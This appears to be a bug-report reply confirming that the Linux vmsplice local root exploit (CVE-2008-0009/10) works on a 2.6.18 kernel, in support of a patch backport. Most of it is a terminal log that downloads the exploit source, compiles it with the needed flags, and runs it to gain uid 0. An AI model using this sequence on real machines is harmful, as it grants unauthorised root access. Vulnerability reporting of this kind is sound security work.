Yep, im sure.
Copy of exploit: http://www.securityfocus.com/bid/27704/exploit
doktor@doktor:~/coding/sample$ wget http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
--12:25:09-- http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
=> `27704.c'
Resolving downloads.securityfocus.com... 205.206.231.23
Connecting to downloads.securityfocus.com|205.206.231.23|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,264 (6.1K) [text/plain]
100%[=================================================================================================================>] 6,264 28.84K/s
12:25:10 (28.75 KB/s) - `27704.c' saved [6264/6264]
doktor@doktor:~/coding/sample$ vi 27704.c
doktor@doktor:~/coding/sample$ uname -a
Linux doktor 2.6.18-6-686 #1 SMP Wed Jan 23 03:23:22 UTC 2008 i686 GNU/Linux
doktor@doktor:~/coding/sample$ id
uid=1000(doktor) gid=1000(doktor) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(doktor),1001(shutdown),1002(vboxusers)
doktor@doktor:~/coding/sample$ head -n 20 27704.c
/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include <stdio.h>
doktor@doktor:~/coding/sample$ gcc -static -Wno-format 27704.c -o root_expl
doktor@doktor:~/coding/sample$ ./root_expl
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7fc8000 .. 0xb7ffa000
[+] root
root@doktor:~/coding/sample# id
uid=0(root) gid=0(root) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(doktor),1001(shutdown),1002(vboxusers)
root@doktor:~/coding/sample# exit
doktor@doktor:~/coding/sample$
So exploit works.
* Okulov Vitaliy:
> Just try explot from http://www.milw0rm.com/exploits/5092 at my
> linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
> from 2.6.24.1 kernel (CVE-2008-0009/10).
Milw0rm is down. Are you sure the exploit is real? The vulnerable code
is not present in the 2.6.18 kernel.